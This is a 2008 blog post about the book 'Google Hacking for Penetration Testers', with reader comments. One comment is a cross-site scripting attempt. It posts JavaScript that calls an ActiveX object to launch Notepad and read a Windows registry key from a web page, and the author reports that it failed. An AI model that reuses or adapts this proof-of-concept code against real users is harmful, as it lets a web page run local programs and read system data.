Super-fast posting mode…

Update: a new version of the book has been released, and is available from Amazon.

 

Published On: January 2, 2008Tags: ,

3 Comments

  1. Linden January 2, 2008 at 3:13 pm - Reply

    A ‘volume 2’ of this book has been released more recently..aptly named ‘Google Hacking for Penetration Testers, Volume 2’ (on amazon).

    [Stuart’s Reply: Definitely worth checking out…]

  2. Linden January 2, 2008 at 4:16 pm - Reply

    Ummm, cross-site scripting? Even if this hasn’t been approved, it might still hack you…mwahahahaha…don’t worry its not malicious, check if the object HTML is there tho…

    function spawn2()
    {
    myObject = document.getElementById(“o2obj”);
    myResults = document.getElementById(“results”);
    myResults.innerHTML = ‘(running tests…)’;
    try
    {
    myObject.LaunchApp(“c:\windows\system32\notepad.exe”,””,1);
    var ret=myObject.GetRegValue(“HKEY_LOCAL_MACHINE”,”SOFTWARE\Classes\CLSID\”+
    “{62DDEB79-15B2-41E3-8834-D3B80493887A}\InprocServer32″,””);
    myResults.innerHTML = ‘Your system does indeed manifest the security flaw!’+
    ‘Please be very careful about accessing ‘+
    ‘unknown websites/HTMLfiles until the security flaw is fixed.’+
    ‘Offending DLL: ‘+ret+”+
    ‘I just read your registry and opened Notepad all from within a simple HTML page!!!’;
    return;
    }
    catch(err)
    {
    //alert(“Your system does not seem to manifest the security flaw!n”+”error message: “+err);
    myResults.innerHTML = ‘Your system does not seem to manifest the security flaw!‘+
    ‘error message: ‘+err;
    return;
    }
    }

    [Stuart’s Reply: Your cross-site scripting attempt did not work. Thanks for the note about volume 2 of the book. :)]

  3. kurthin May 6, 2008 at 3:26 am - Reply

    The free download has been removed?

    [Stuart’s Reply: Yes. Scribd has removed the content for copyright reasons.]

Leave A Comment